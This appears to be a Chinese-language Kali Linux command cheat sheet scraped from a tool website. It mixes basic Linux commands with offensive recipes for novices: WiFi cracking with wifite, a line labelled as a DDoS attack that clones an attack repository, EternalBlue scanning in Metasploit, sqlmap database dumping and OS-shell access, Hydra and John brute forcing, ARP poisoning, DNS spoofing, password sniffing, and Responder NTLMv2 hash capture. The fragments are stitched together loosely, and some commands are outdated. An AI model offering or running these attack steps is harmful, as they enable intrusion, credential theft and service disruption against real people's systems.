由 Lྱྲ 制作
# 安装 wifite 工具 apt update apt install wifite -y
# 启动工具 wifite # 输入 1 开始扫描附近WiFi
1. 设备要求:电脑内存≥4GB,硬盘剩余空间≥20GB,需在BIOS开启Intel VT-x/AMD-V虚拟化
2. 必备工具:VMware Workstation(推荐)或VirtualBox虚拟机软件
3. 下载渠道:仅使用Kali官方镜像,拒绝第三方修改版,避免恶意程序
1. 打开浏览器,访问Kali官方下载地址:https://www.kali.org/get-kali/
2. 新手优先选择:Kali Linux Virtual Machine Images(虚拟机专用镜像)
1. 安装VMware Workstation,双击安装包,默认下一步完成安装,重启电脑
2. 将下载好的Kali镜像压缩包,解压到**全英文路径**文件夹(禁止中文路径)
3. 打开VMware,点击左上角【文件->打开】,选中解压后后缀为.vmx的文件
4. 编辑虚拟机设置:分配内存≥2GB,处理器核心≥2核,保存设置
1. 选中虚拟机,点击【开启此虚拟机】,等待系统启动
2. 默认登录账号:kali,密码kali
# 打开终端,执行以下基础配置命令 # 1. 切换root管理员权限 sudo su # 输入默认密码kali # 2. 更新系统软件源 apt update # 3. 升级系统全部软件 apt upgrade -y # 4. 修改默认root密码(提升安全性) passwd
exiftool -gps:all /sdcard/Pictures/OtherFolder/你的照片名.jpg
1. 虚拟机启动报错:进入电脑BIOS,开启虚拟化技术选项
2. 密码无法输入:Linux系统输入密码不显示,直接输入后按回车即可
3. 下载速度缓慢:更换网络,或选择国内开源镜像站下载
# 更新软件源列表 apt update # 升级系统已安装软件 apt upgrade -y # 安装指定工具 apt install 工具名 -y # 卸载工具 apt remove 工具名 -y
# 查看本机IP地址 ip a ifconfig # 测试网络连通性 ping 目标IP/网址 # 查看端口占用 netstat -ntlp
# 查看当前目录文件 ls # 进入指定文件夹 cd 文件夹名称 # 新建文件夹 mkdir 文件夹名 # 删除文件/文件夹 rm -rf 文件/文件夹名 # 查看当前所在路径 pwd
# 基础端口扫描 nmap 目标IP # 全端口深度扫描 nmap -p 1-65535 目标IP # 探测目标系统与服务版本 nmap -A 目标IP # DDOS攻击 apt update && apt install python3 git -y && git clone https://github.com/pembriahmad/DDOS
# 启动MSF框架 msfconsole # 搜索漏洞模块 search 漏洞名称 # 调用模块 use 模块路径 # 查看模块配置参数 show options # 设置目标IP/端口 set RHOST 目标IP set LPORT 本地端口 # 执行模块 run exploit
# 提权检测脚本 wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh ./linpeas.sh # 查看历史命令 history cat ~/.bash_history
#进入msf msfconsole #扫描网段 use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.1.0/24 run #端口漏洞扫描 use auxiliary/scanner/ports/tcp set RHOSTS 目标IP set PORTS 1-1000 run #最后 use auxiliary/scanner/smb/smb_version set RHOSTS 目标IP run #结合永恒之蓝漏洞 # 搜索漏洞 search cve-2017-0144 # 加载扫描模块 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 目标IP
# 检测目标URL是否存在SQL注入漏洞 sqlmap -u "http://目标网址/index.php?id=1" # 自动确认所有提示,无需手动输入 sqlmap -u "http://目标网址/index.php?id=1" --batch
# 列出所有数据库 sqlmap -u "http://目标网址/index.php?id=1" --dbs # 指定数据库,列出所有表 sqlmap -u "http://目标网址/index.php?id=1" -D 数据库名 --tables # 指定表,列出所有字段 sqlmap -u "http://目标网址/index.php?id=1" -D 数据库名 -T 表名 --columns # 读取字段中的数据(脱库) sqlmap -u "http://目标网址/index.php?id=1" -D 数据库名 -T 表名 -C "字段1,字段2" --dump
# 带Cookie检测(需要登录的页面) sqlmap -u "http://目标网址/index.php?id=1" --cookie="PHPSESSID=xxx" # 深度检测(提高level和risk) sqlmap -u "http://目标网址/index.php?id=1" --level 5 --risk 3 # 尝试获取服务器系统权限 sqlmap -u "http://目标网址/index.php?id=1" --os-shell
暴力破解是通过批量尝试密码组合,试图破解账号、设备、系统密码的行为,属于典型网络攻击手段。
1. 设置12位以上强密码,包含字母、数字、符号
2. 开启双重认证
3. 限制登录错误次数
4. 定期更换密码
# 测试自有设备密码强度 john --wordlist=字典.txt 哈希文件.txt # 自有靶场SSH安全测试 hydra -L 用户.txt -P 字典.txt 靶场IP ssh -t 4
提示:直接调用DeepSeek API,填入Key即可使用,支持多轮对话
# 安装mitmproxy工具 apt update && apt install mitmproxy -y # 普通代理模式(Termux/虚拟机通用,最稳定) mitmproxy --listen-port 8080 # 透明代理模式(需要开启流量转发) sysctl -w net.ipv4.ip_forward=1 iptables-legacy -t nat -A POSTROUTING -o wlan0 -j MASQUERADE mitmproxy --mode transparent --listen-port 8080 # 导出HTTPS解密证书(路径固定) ls ~/.mitmproxy/mitmproxy-ca-cert.pem # 常用快捷键 ? 打开帮助菜单 ↑/↓ 上下滚动请求列表 Enter 查看请求/响应详情 e 编辑修改请求/响应数据 r 重放请求 q 返回上一级/退出
Binwalk 是Kali专用固件逆向工具,用于解析路由器、IoT设备、刷机包、BIN镜像,提取内置文件系统、内核、隐藏配置文件。
# 更新软件源 apt update # 安装 Binwalk 核心工具 apt install binwalk -y # 安装全套解压依赖组件 binwalk --install-deps
# 简单扫描固件结构 binwalk 固件名.bin # 自动提取所有文件 binwalk -e 固件名.bin # 递归深度解压(多层嵌套必用) binwalk -Me 固件名.bin # 熵值检测,判断加密压缩区域 binwalk -E 固件名.img # 扫描设备架构指令集 binwalk -A 固件名.bin
# 查看固件内部结构 binwalk test.bin # 一键递归全部解包 binwalk -Me test.bin # 进入解压目录 cd _test.bin.extracted # 查看系统配置与账号文件 ls cat etc/passwd
SquashFS 嵌入式只读文件系统
yaffs2 安卓老式分区格式
UBoot 设备引导程序
ext4 标准Linux文件分区
# 更新软件源 apt update # 安装 Autopsy apt install autopsy -y
# 输入以下命令启动服务 autopsy # 终端会输出类似这样的地址 http://localhost:9999/autopsy # 复制这个地址到 Firefox 浏览器打开,即可进入图形化界面
恢复误删文件(图片/文档/压缩包)
查看浏览器历史记录、Cookie、下载痕迹
分析文件时间线,还原操作轨迹
提取照片 EXIF 信息(拍摄时间/地点)
CC攻击(Challenge Collapsar)的核心是:通过大量正常请求占用服务器资源,导致合法用户无法访问。学习时,我们仅用轻量工具模拟原理,不会造成实际破坏。
# 1. 安装 Apache Bench 工具 apt update && apt install apache2-utils -y # 2. 验证安装(能看到帮助信息即成功) ab -h # 3. 对自用靶场发送100个请求,并发10个(仅测试自己的服务器!) ab -n 100 -c 10 http://你的靶场地址/
# 1. 更新软件源 pkg update && pkg upgrade -y # 2. 安装 apache2(包含ab工具) pkg install apache2 -y # 3. 验证安装(Termux里命令是apache2-ab) apache2-ab -h # 4. 对本地靶场测试请求压力 apache2-ab -n 50 -c 5 http://127.0.0.1:8080/
仅测试自己的服务器,且获得书面授权;
控制请求数量,避免误打他人网络;
学习后立即停止测试,不要持续发送请求。
1、Ctrl + Alt + T 打开一个新的命令行终端。 2、Alt + F4 关闭当前窗口。 3、Alt + F11 最大化当前窗口。 4、Alt + F3 打开应用程序查找器。 5、PrtSc 使用此快捷方式截取屏幕截图。 6、Super + PrtSc 打开 Kazam(截图/截屏工具) 7、Ctrl + N 新建窗口 8、Ctrl + X 切换窗口 9、Ctrl + C 复制 10、Ctrl + Z 撤销 11、Ctrl + S 保存 12、Ctrl + Q 退出 13、F1 获取在线帮助 14、F10 左键单击菜单或光标 15、Alt + F1 打开窗口 16、Alt + F2 打开命令窗口 17、Alt + F7 移动窗口 18、Alt + 空格 激活窗口菜单 19、Alt + F10 切换最大化状态
1、Ctrl + D 关闭终端窗口 2、Ctrl + + 放大终端 3、Ctrl + - 缩小终端 4、Ctrl + L 清除终端 5、Ctrl + C 取消当前正在运行的命令 6、Ctrl + A 将光标移动到行首 7、Ctrl + B 将光标向后移动一个字符 8、Ctrl + E 将光标移动到行尾 9、Ctrl + F 将光标向前移动一个字符
1、arch :显示机器的处理器架构 2、uname -m :显示机器的处理器架构 3、uname -r :显示正在使用的内核版本 4、dmidecode -q :显示硬件系统部件信息 5、hdparm -i /dev/hda :罗列磁盘的架构特性 6、hdparm -tT /dev/sda :在磁盘上执行测试性读取操作 7、cat /proc/cpuinfo :显示CPU info的信息 8、cat /proc/interrupts :显示中断 9、cat /proc/meminfo :校验内存使用 10、cat /proc/swaps :显示哪些swap被使用 11、cat /proc/version :显示内核的版本 12、cat /proc/net/dev :显示网络适配器及统计 13、cat /proc/mounts :显示已加载的文件系统 14、lspci -tv :罗列 PCI 设备 15、lsusb -tv :显示 USB 设备 16、date :显示系统日期 17、cal 2007 :显示2007年的日历表 18、date 041217002007.00 :设置日期和时间 19、clock -w :将时间修改保存到 BIOS 20、shutdown -h now :关闭系统 21、init 0 :关闭系统 22、shutdown -h hours:minutes & :按预定时间关闭系统 23、shutdown -c :取消按预定时间关闭系统 24、shutdown -r now :重启 25、reboot :重启 26、logout :注销
1、cd /home :进入 '/home' 目录 2、cd .. :返回上一级目录 3、cd ../.. :返回上两级目录 4、cd :进入个人的主目录 5、cd ~user1 :进入个人的主目录 6、cd - :返回上次所在的目录 7、pwd :显示工作路径 8、ls :查看目录中的文件 9、ls -F :查看目录中的文件 10、ls -l :显示文件和目录的详细资料 11、ls -a :显示隐藏文件 12、ls [0-9] :显示包含数字的文件名和目录名 13、tree :显示文件和目录由根目录开始的树形结构 14、lstree :显示文件和目录由根目录开始的树形结构 15、mkdir dir1 :创建一个叫做 'dir1' 的目录 16、mkdir dir1 dir2 :同时创建两个目录 17、mkdir -p /tmp/dir1/dir2 :创建一个目录树 18、rm -f file1 :删除一个叫做 'file1' 的文件 19、rm -rf dir, :删除一个叫做 'dir1' 的目录及其内容 20、mv dir1 :重命名/移动一个目录 21、cp file1 file2, :复制一个文件 22、cp dir/* :复制一个目录下的所有文件到当前工作目录 23、cp -a /tmp/dir1 :复制一个目录到当前工作目录 24、cp -a dir1 dir2 :复制一个目录 25、touch -t 0712250000 file1 :修改文件时间戳(YYMMDDhhmm)
1、groupadd group_name :创建一个新用户组 2、groupdel group_name :删除一个用户组 3、groupmod -n new_group_name old_group_name :重命名用户组 4、useradd user1 :创建一个新用户 5、userdel -r user1 :删除用户并排除主目录 6、usermod -c "User FTP" -g system -d/ftp/user1 -s /bin/nologin user1 :修改用户属性 7、passwd :修改口令 8、passwd user1 :修改用户口令(只允许root执行) 9、chage -E 2005-12-31 user1 :设置用户口令失效期限 10、pwck :检查 /etc/passwd 文件格式和语法 11、grpck :检查 /etc/group 文件格式和语法 12、newgrp group_name :登陆进新群组,改变新建文件预设群组
1、ls /tmp | pr -T5 -W$COLUMNS :将终端划分成5栏显示 2、chown user1 file1 :改变文件的所有人属性 3、chown -R user1 directory1 :改变目录及所有文件的所有人属性 4、chgrp group1 file1 :改变文件的群组 5、chown user1:group1 file1 :改变文件的所有人和群组属性 6、find / -perm -u+s :罗列系统中所有使用了SUID控制的文件 7、chmod u+s /bin/file1 :设置二进制文件的SUID位 8、chmod u-s /bin/file1 :禁用二进制文件的SUID位 9、chmod g+s /home/public :设置目录的SGID位 10、chmod g-s /home/public :禁用目录的SGID位
1、chattr +a file1 :只允许以追加方式读写文件 2、chattr +c file1 :允许文件被内核自动压缩/解压 3、chattr +d file1 :文件备份时dump程序忽略此文件 4、chattr +i file1 :设置成不可变文件,不能被删除/修改/重命名/链接 5、chattr +s file1 :允许文件被安全地删除 6、chattr +S file1 :文件写操作后系统立刻把修改结果写到磁盘 7、chattr +u file1 :文件被删除后可恢复 8、lsattr :显示文件的特殊属性
1、whois :域名/IP查看域名的详细信息 2、ping :域名/IP测试本机到远端主机是否联通 3、dig :域名/IP查看域名解析的详细信息 4、host -l :域名dns服务器传输zone
1、nc ip port :检测端口是否打开 2、telnet ip port :检测端口是否打开 3、wget ip :下载主页 4、cat index.html | more :显示主页代码 5、q :退出
1、find / -name file1 :从根目录开始搜索文件和目录
2、find / -user user1 :搜索属于用户user1的文件和目录
3、find /home/user1 -name *.bin :搜索目录下以.bin结尾的文件
4、find /usr/bin -type f -atime +100 :搜索过去100天未被使用的执行文件
5、find /usr/bin -type f -mtime -10 :搜索10天内被创建或修改过的文件
6、find / -name *.rpm -exec chmod 755 '{}' :搜索以.rpm结尾的文件并定义其权限
7、locate *.ps :寻找以.ps结尾的文件(需先运行updatedb)
8、whereis halt :显示二进制文件、源码或man的位置
9、which halt :显示二进制文件或可执行文件的完整路径
1、mount /dev/hda2 /mnt/hda2 :挂载磁盘到指定目录 2、umount /dev/hda2 :卸载磁盘(需先退出挂载点) 3、fuser -km /mnt/hda2 :设备繁忙时强制卸载 4、mount /dev/fd0 /mnt/floppy :挂载软盘 5、mount /dev/cdrom /mnt/cdrom :挂载CD/DVD光驱 6、mount /dev/hdc /mnt/cdrecorder :挂载CDRW/DVDROM 7、mount /dev/hdb /mnt/cdrecorder :挂载CDRW/DVDROM 8、mount -o loop file.iso /mnt/cdrom :挂载ISO镜像文件 9、mount -t vfat /dev/hda5 /mnt/hda5 :挂载Windows FAT32文件系统 10、mount /dev/sda1 /mnt/usbdisk :挂载U盘或闪存设备
1、-sS :半开TCP SYN扫描 2、-sT :完全TCP连接扫描 3、-sU :UDP扫描 4、-PS syn :包探测(防火墙探测) 5、-PN :不ping目标主机 6、-n :不进行DNS解析 7、-O :操作系统识别 8、-sV :服务版本信息(Banner抓取) 9、-iL :导入扫描结果 10、-T :设置扫描时间级别 11、-oG :输出扫描结果 12、p0f -i eth0 -U -p :开启混杂模式流量分析
1、nmap -sS -p 139,445 ip :扫描Windows主机端口 2、nbtscan -f targetIP :检测NetBIOS信息 3、smbgetserverinfo -i targetIP :扫描主机名、操作系统、组信息 4、smbdumpusers -i targetIP :列出用户信息 5、smbclient -L //targetIP :列出共享资源
1、svn update :更新Metasploit版本 2、./msfweb :启动Web接口(地址127.0.0.1:55555) 3、./msfconsole :启动命令行控制台 4、help :查看帮助 5、show :显示模块选项
1、nano /usr/local/etc/etter.conf :编辑Ettercap配置文件 2、Hosts > Scan for hosts :扫描网段主机(建议执行两次) 3、Hosts > Hosts list :显示主机列表 4、Select the default gateway > Add to Target 1 :添加网关为目标1 5、Select the target > Add to Target 2 :添加目标主机为目标2 6、Mitm > Arp poisoning > Sniff remote connections > OK :设置ARP攻击 7、Start > Start sniffing :开始攻击 8、dsniff -i eth0 :监听网卡捕获登录用户密码 9、urlsnarf -i eth0 :嗅探HTTP请求 10、msgsnarf -i eth0 :嗅探聊天软件聊天内容 11、driftnet -i eth0 :嗅探网络图片、音频
1、nano /usr/local/share/ettercap/etter.dns :编辑DNS欺骗配置文件 2、Plugins > Manage the plugins > dns_spoof :加载DNS欺骗插件 3、Mitm > Arp poisoning > Sniff remote connections > OK :开启ARP中间人攻击 4、Start > Start sniffing :开始攻击
1、cd /pentest/exploits/exploit-db :进入Exploit-DB目录 2、cat sploitlist.txt | grep -i [exploit] :查询需要的漏洞利用代码 3、cat exploit | grep "#include" :检查漏洞代码运行环境 4、cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u :筛选可在Linux下运行的漏洞代码
# 1. 更新系统软件源 sudo apt update && sudo apt upgrade -y # 2. 安装/确认 John the Ripper(Kali 系统默认自带) sudo apt install john -y # 3. 验证安装是否成功 john --version
# 1. 安装哈希捕获工具 Responder sudo apt install responder -y # 2. 启动 Responder 捕获 NTLMv2 认证哈希 sudo responder -I eth0 # 3. 捕获到的哈希会自动保存在: # /usr/share/responder/logs/Responder-Session.log
# 1. 把捕获到的 NTLMv2 哈希复制到 hash.txt 文件 # 示例哈希格式(和你截图里的格式一致): user::DOMAIN:112233445566:778899AABBCCDDEE:0102030405060708090A0B0C0D0E0F10111213141516171819 # 2. 执行 John the Ripper 爆破 john --format=netntlmv2 hash.txt # 3. 查看已破解的明文密码 john --show --format=netntlmv2 hash.txt # 4. 可选:使用自定义字典爆破(效果更强) john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
结果将显示在这里